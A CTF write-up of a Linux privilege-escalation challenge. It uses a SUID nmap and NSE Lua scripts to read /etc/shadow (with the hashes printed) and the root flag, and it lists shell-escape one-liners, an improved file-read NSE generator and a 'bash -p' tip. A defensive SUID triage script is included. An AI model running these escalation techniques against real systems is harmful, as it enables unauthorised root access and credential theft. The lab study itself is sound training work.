こんとろーるしーこんとろーるぶい (Control-C Control-V)

A blog for pasting up whatever I hammered out on the keyboard over the weekend

CSA CTF 2019 Writeup - Linux 2

Question

ssh user@35.231.176.102 -p1774 
Password: utsacyber


Solution

user@7ab7e9c7f6a4:~$ ll
total 32
drwxr-xr-x 1 user user 4096 Apr 27 14:35 ./
drwxr-xr-x 1 root root 4096 Apr 22 20:12 ../
-rw-r--r-- 1 user user  220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 user user 3771 Aug 31  2015 .bashrc
drwx------ 2 user user 4096 Apr 27 14:35 .cache/
-rw-r--r-- 1 user user  655 May 16  2017 .profile
-rw-rw-r-- 1 root root   10 Apr 22 20:56 readme.txt
user@7ab7e9c7f6a4:~$ cat readme.txt 
Get root.

Looks like a privilege escalation challenge.

I use linuxprivchecker and LinEnum to look for a foothold.

linuxprivchecker

user@7ab7e9c7f6a4:~$ cd /tmp/
user@7ab7e9c7f6a4:/tmp$ wget https://www.securitysift.com/download/linuxprivchecker.py
--2019-04-27 14:39:10--  https://www.securitysift.com/download/linuxprivchecker.py
Resolving www.securitysift.com (www.securitysift.com)... 173.254.14.183
Connecting to www.securitysift.com (www.securitysift.com)|173.254.14.183|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25304 (25K) [application/octet-stream]
Saving to: 'linuxprivchecker.py'

linuxprivchecker.py       100%[=====================================>]  24.71K  --.-KB/s    in 0s      

2019-04-27 14:39:10 (54.0 MB/s) - 'linuxprivchecker.py' saved [25304/25304]

user@7ab7e9c7f6a4:/tmp$ python linuxprivchecker.py 
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================

[*] GETTING BASIC SYSTEM INFO...

[+] Kernel
    Linux version 4.15.0-1029-gcp (buildd@lcy01-amd64-029) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #31-Ubuntu SMP Thu Mar 21 09:40:28 UTC 2019

[+] Hostname
    7ab7e9c7f6a4

[+] Operating System
    Ubuntu 16.04.6 LTS \n \l

(snip)

[+] SUID/SGID Files and Directories
    -rwxr-sr-x 1 root shadow 35632 Apr  9  2018 /sbin/pam_extrausers_chkpwd
    -rwxr-sr-x 1 root shadow 35600 Apr  9  2018 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root root 40128 May 16  2017 /bin/su
    -rwsr-xr-x 1 root root 40152 May 16  2018 /bin/mount
    -rwsr-xr-x 1 root root 27608 May 16  2018 /bin/umount
    -rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
    -rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
    drwxrwsr-x 7 root staff 4096 Apr 22 20:12 /usr/local/share/sgml
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/declaration
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/misc
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/stylesheet
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/dtd
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/entities
    drwxrwsr-x 6 root staff 4096 Apr 22 20:12 /usr/local/share/xml
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/declaration
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/misc
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/schema
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/entities
    drwxrwsr-x 3 root staff 4096 Apr 22 20:12 /usr/local/lib/python3.5
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/lib/python3.5/dist-packages
    drwxrwsr-x 4 root staff 4096 Apr 22 20:12 /usr/local/lib/python2.7
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/lib/python2.7/dist-packages
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/lib/python2.7/site-packages
    -rwsr-xr-x 1 root root 49584 May 16  2017 /usr/bin/chfn
    -rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
    -rwsr-xr-x 1 root root 40432 May 16  2017 /usr/bin/chsh
    -rwsr-xr-x 1 root root 39904 May 16  2017 /usr/bin/newgrp
    -rwxr-sr-x 1 root shadow 62336 May 16  2017 /usr/bin/chage
    -rwsr-xr-x 1 root root 75304 May 16  2017 /usr/bin/gpasswd
    -rwxr-sr-x 1 root tty 27368 May 16  2018 /usr/bin/wall
    -rwxr-sr-x 1 root shadow 22768 May 16  2017 /usr/bin/expiry
    -rwsr-xr-x 1 root root 2770528 Mar 31  2016 /usr/bin/nmap
    -rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
    -rwxr-sr-x 1 root ssh 358624 Mar  4 14:09 /usr/bin/ssh-agent
    -rwsr-xr-x 1 root root 428240 Mar  4 14:09 /usr/lib/openssh/ssh-keysign
    drwxrwsr-x 2 root staff 4096 Apr 12  2016 /var/local
    drwxrwsr-x 2 root mail 4096 Feb 22 10:05 /var/mail

(snip)

[+] Installed Tools
    /usr/bin/awk
    /usr/bin/perl
    /usr/bin/python
    /usr/bin/vi
    /usr/bin/vim
    /usr/bin/nmap
    /usr/bin/find
    /bin/netcat
    /bin/nc
    /usr/bin/wget

[+] Related Shell Escape Sequences...

    nmap-->  --interactive
    vi-->    :!bash
    vi-->    :set shell=/bin/bash:shell
    vi-->    :!bash
    vi-->    :set shell=/bin/bash:shell
    awk-->   awk 'BEGIN {system("/bin/bash")}'
    find-->  find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
    perl-->  perl -e 'exec "/bin/bash";'

[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...

    Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!

    The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system

    The following exploits are applicable to this kernel version and should be investigated as well
    - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
    - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
    - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
    - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
    - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
    - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c

Finished
=================================================================================================

LinEnum

user@7ab7e9c7f6a4:/tmp$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2019-04-27 14:40:28--  https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45639 (45K) [text/plain]
Saving to: 'LinEnum.sh'

LinEnum.sh                                    100%[==============================================================================================>]  44.57K  --.-KB/s    in 0.02s   

2019-04-27 14:40:28 (1.84 MB/s) - 'LinEnum.sh' saved [45639/45639]

user@7ab7e9c7f6a4:/tmp$ chmod 777 ./LinEnum.sh 
user@7ab7e9c7f6a4:/tmp$ ./LinEnum.sh 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.96

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Sat Apr 27 14:41:02 UTC 2019

(snip)

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/nmap
/usr/bin/curl


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1328 Apr 22 20:12 /etc/passwd
-rw-r--r-- 1 root root 602 Apr 22 20:12 /etc/group
-rw-r--r-- 1 root root 575 Oct 22  2015 /etc/profile
-rw-r----- 1 root shadow 898 Apr 22 20:12 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 40128 May 16  2017 /bin/su
-rwsr-xr-x 1 root root 40152 May 16  2018 /bin/mount
-rwsr-xr-x 1 root root 27608 May 16  2018 /bin/umount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 49584 May 16  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 40432 May 16  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 39904 May 16  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75304 May 16  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 2770528 Mar 31  2016 /usr/bin/nmap
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 428240 Mar  4 14:09 /usr/lib/openssh/ssh-keysign


[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 2770528 Mar 31  2016 /usr/bin/nmap

(snip)

### SCAN COMPLETE ####################################
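Both tools print the same SUID list, and LinEnum's "Possibly interesting SUID files" does the triage that matters: which SUID-root binaries can spawn a shell or read files while keeping the root effective uid. The script below does that triage by hand, over the listing format the tools print, and shows the one-line fix. It is an added example, not part of the original write-up or of either tool; the RISKY_SUID list is my own assumption, drawn from the shell-escape table printed by linuxprivchecker above plus GTFOBins, and the sample listing is constructed from the LinEnum output on this page.

```shell
#!/bin/sh
# Added example (not from the write-up or from LinEnum/linuxprivchecker):
# flag SUID-root binaries that are known to hand back a shell or arbitrary
# file reads with the SUID euid intact, then show the hardening step.

# Assumption: basenames that can escape to a shell or read files without
# dropping privileges (linuxprivchecker's escape table above + GTFOBins).
RISKY_SUID="nmap vim vi awk find perl python python3 less more nano env cp tee"

# enumerate_suid_root: SUID files owned by root, printed in `ls -l` format
# so the output can be piped straight into flag_risky_suid. No root needed.
enumerate_suid_root() {
    find / -xdev -type f -user root -perm -4000 -exec ls -l {} + 2>/dev/null
}

# flag_risky_suid: read `ls -l` lines on stdin, print the path of every
# SUID file (4th mode character is s/S) whose basename is in RISKY_SUID.
# SGID-only entries such as /usr/bin/chage (-rwxr-sr-x) are not flagged.
flag_risky_suid() {
    awk -v risky="$RISKY_SUID" '
        BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) want[r[i]] = 1 }
        substr($1, 4, 1) ~ /[sS]/ {
            path = $NF
            base = path; sub(/.*\//, "", base)
            if (base in want) print path
        }'
}

# drop_suid PATH: the fix for a binary that has no business being SUID.
drop_suid() {
    chmod u-s "$1"
}

# Constructed sample: five lines copied from the LinEnum "SUID files" output
# above (chage is from the linuxprivchecker SGID list, included as a negative).
SAMPLE='-rwsr-xr-x 1 root root 40128 May 16  2017 /bin/su
-rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 2770528 Mar 31  2016 /usr/bin/nmap
-rwxr-sr-x 1 root shadow 62336 May 16  2017 /usr/bin/chage
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo'

echo "Risky SUID binaries in the constructed sample listing:"
printf '%s\n' "$SAMPLE" | flag_risky_suid

# Run against the live system only when asked to (a full find can be slow).
if [ "${LIVE_SCAN:-0}" = "1" ]; then
    echo "Risky SUID binaries on this host:"
    enumerate_suid_root | flag_risky_suid
fi
```

On the challenge box, `LIVE_SCAN=1 sh suid_triage.sh` would print `/usr/bin/nmap` and nothing else; `drop_suid /usr/bin/nmap` (as root) is the remediation, since nmap only needs raw sockets and those can be granted with `setcap cap_net_raw+ep` instead of a setuid bit.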

nmap is installed and has the SUID bit set. After some searching on the web I find the following page.

gtfobins.github.io/gtfobins/nmap/

It looks like nmap's --script option can be used.

I try what the page above describes, but as written it does not get me a shell. Maybe it needs one more trick.
The File read procedure (with a small tweak), however, does let me read /etc/shadow. As the output below shows, the io.open/print runs while nmap is still loading the script, so the file contents appear before NSE complains that the script has no 'action' field and quits.

user@7ab7e9c7f6a4:/tmp$ TF=$(mktemp)
user@7ab7e9c7f6a4:/tmp$ echo 'f=io.open("/etc/shadow", "rb"); print(f:read("*a")); io.close(f);' > $TF
user@7ab7e9c7f6a4:/tmp$ nmap --script=$TF

Starting Nmap 7.01 ( https://nmap.org ) at 2019-04-27 14:43 UTC
WARNING: Running Nmap setuid, as you are doing, is a major security risk.

NSE: Warning: Loading '/tmp/tmp.Sr3NS1BmQI' -- the recommended file extension is '.nse'.
root:$6$i09NKN3z$3ubpJ2G77IKDzS5KKfYjGx3p4MM7ISlhKmDD/.4oJ8Yf88CkRnJVoqdS4BMh8Vae/fQg3.Rjvcbxb4IHgmAqn0:18008:0:99999:7:::
daemon:*:17949:0:99999:7:::
bin:*:17949:0:99999:7:::
sys:*:17949:0:99999:7:::
sync:*:17949:0:99999:7:::
games:*:17949:0:99999:7:::
man:*:17949:0:99999:7:::
lp:*:17949:0:99999:7:::
mail:*:17949:0:99999:7:::
news:*:17949:0:99999:7:::
uucp:*:17949:0:99999:7:::
proxy:*:17949:0:99999:7:::
www-data:*:17949:0:99999:7:::
backup:*:17949:0:99999:7:::
list:*:17949:0:99999:7:::
irc:*:17949:0:99999:7:::
gnats:*:17949:0:99999:7:::
nobody:*:17949:0:99999:7:::
systemd-timesync:*:17949:0:99999:7:::
systemd-network:*:17949:0:99999:7:::
systemd-resolve:*:17949:0:99999:7:::
systemd-bus-proxy:*:17949:0:99999:7:::
_apt:*:17949:0:99999:7:::
sshd:*:18008:0:99999:7:::
user:$6$xReGWCgk$2OD/Q2jXewLgbryfcZZugNCic/xBt.BKkbk5dB6BcRQmNdw.yw6PC1S8N40Tm7WymaTh4K927hFGUJ9aoSm/1.:18008:0:99999:7:::

NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:607: /tmp/tmp.Sr3NS1BmQI is missing required field: 'action'
stack traceback:
    [C]: in function 'error'
    /usr/bin/../share/nmap/nse_main.lua:607: in function 'new'
    /usr/bin/../share/nmap/nse_main.lua:805: in function 'get_chosen_scripts'
    /usr/bin/../share/nmap/nse_main.lua:1249: in main chunk
    [C]: in ?

QUITTING!

Since the previous challenge's flag was in flag.txt and readme.txt says Get root.,
I guess the flag file is /root/flag.txt.

user@7ab7e9c7f6a4:/tmp$ echo 'f=io.open("/root/flag.txt", "rb"); print(f:read("*a")); io.close(f);' > $TF
user@7ab7e9c7f6a4:/tmp$ nmap --script=$TF

Starting Nmap 7.01 ( https://nmap.org ) at 2019-04-27 14:44 UTC
WARNING: Running Nmap setuid, as you are doing, is a major security risk.

NSE: Warning: Loading '/tmp/tmp.Sr3NS1BmQI' -- the recommended file extension is '.nse'.
CSACTF{sh3_d0esnt_3v3n_g0_h3r3}

NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:607: /tmp/tmp.Sr3NS1BmQI is missing required field: 'action'
stack traceback:
    [C]: in function 'error'
    /usr/bin/../share/nmap/nse_main.lua:607: in function 'new'
    /usr/bin/../share/nmap/nse_main.lua:805: in function 'get_chosen_scripts'
    /usr/bin/../share/nmap/nse_main.lua:1249: in main chunk
    [C]: in ?

QUITTING!

Flag obtained.
CSACTF{sh3_d0esnt_3v3n_g0_h3r3}
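The two nmap runs above work only as a side effect: the read happens in the script's top-level chunk during loading, and nmap then aborts because nse_main.lua requires every script to define `description`, `categories` and `action`. A well-formed NSE script puts the read inside `action` and declares a `prerule`, so it runs once in the pre-scan phase (no target is needed, the same way the broadcast-* scripts are run) and nmap exits cleanly with the contents under "Pre-scan script results:". The shell script below writes such a file and runs it; it is an added example, not code from the write-up or from the Nmap project, and the script name readfile.nse and the helper names are my own choices. The /etc/shadow path is the one used on this page.

```shell
#!/bin/sh
# Added example (not part of the original write-up): generate a well-formed
# NSE script that reads a file inside `action`, so a SUID nmap returns the
# contents without the "missing required field: 'action'" abort shown above.
# Requires nmap 7.x with NSE; script/helper names are arbitrary choices.

# write_readfile_nse SCRIPT_PATH TARGET_FILE
# Emits the three fields nse_main.lua requires (description, categories,
# action) plus a prerule, which makes the script run before any host scan.
write_readfile_nse() {
    script="$1"
    target="$2"
    cat > "$script" <<EOF
description = [[Reads a file with nmap's effective uid (root when SUID).]]
categories = {"safe"}

-- Pre-scan rule: run once, before any target is scanned, so no target
-- argument is needed on the nmap command line.
prerule = function() return true end

action = function()
  local f, err = io.open("$target", "rb")
  if not f then return "open failed: " .. tostring(err) end
  local data = f:read("*a")
  f:close()
  return data
end
EOF
}

# nse_has_required_fields SCRIPT_PATH: sanity check that can run without
# nmap installed; exits non-zero if any required field is missing.
nse_has_required_fields() {
    grep -q '^description = ' "$1" &&
    grep -q '^categories = ' "$1" &&
    grep -q '^action = function' "$1"
}

# run_readfile SCRIPT_PATH: no target given; output appears under
# "Pre-scan script results:" because the script only has a prerule.
run_readfile() {
    nmap --script="$1"
}

WORK=$(mktemp -d)
SCRIPT="$WORK/readfile.nse"      # .nse suffix avoids the extension warning
write_readfile_nse "$SCRIPT" /etc/shadow
nse_has_required_fields "$SCRIPT" && echo "wrote $SCRIPT"

if command -v nmap >/dev/null 2>&1; then
    run_readfile "$SCRIPT"
else
    echo "nmap not installed here; inspect $SCRIPT and run: nmap --script=$SCRIPT"
fi
```

Without the SUID bit the action simply returns "open failed: /etc/shadow: Permission denied", which is the expected result on a hardened host. If you go on to the GTFOBins shell variant rather than a file read, keep in mind that bash resets an effective uid that differs from the real uid unless it is started with `-p`, so spawn `bash -p` (or check `id` right after the spawn) before concluding that the setuid did not carry over.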